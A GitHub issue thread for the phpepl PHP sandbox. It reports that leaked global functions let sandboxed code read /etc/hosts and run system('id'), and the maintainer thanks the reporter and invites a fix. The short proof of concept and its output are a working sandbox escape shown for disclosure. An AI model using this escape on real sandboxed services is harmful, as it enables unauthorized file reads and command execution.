### ISSUE TITLE
Dangerous global functions exposed to the sandbox

### ISSUE THREAD

**Issue by ChaosData** [mrjoelkemp/phpepl#32]
A few dangerous functions are being exposed in the global space that can be called from sandboxed code running in [fieryprophet/php-sandbox](https://github.com/fieryprophet/php-sandbox). Specifically, the functions `php_execute_raw` ([src/eval/index.php](https://github.com/mrjoelkemp/phpepl/blob/master/src/eval/index.php)), `composerRequirec5eb6c61dea33c587b462d2698a7e677` ([vendor/composer/autoload_real.php](https://github.com/mrjoelkemp/phpepl/blob/master/vendor/composer/autoload_real.php)), and `\Composer\Autoload\includeFile` ([vendor/composer/ClassLoader.php](https://github.com/mrjoelkemp/phpepl/blob/master/vendor/composer/ClassLoader.php)).

For example, when I execute the following sandboxed code:
```PHP
composerRequirec5eb6c61dea33c587b462d2698a7e677('/etc/hosts');
\Composer\Autoload\includeFile('/etc/hostname');
php_execute_raw('system("id");');
```

The output is:
```
127.0.0.1	localhost 127.0.1.1	ubuntu # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters
ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

The functions at issue are generally one-line functions and could be replaced with their code in the places that they are called. However, it might just be easier to add them to the blacklist, and add a filtering rule for any function starting with `composerRequire`.

**Comment by mrjoelkemp** [comment]
Awesome find @ChaosData. Thanks for contributing. 

Would you like to submit a PR with the fixes? We can answer any setup or implementation questions you might have.
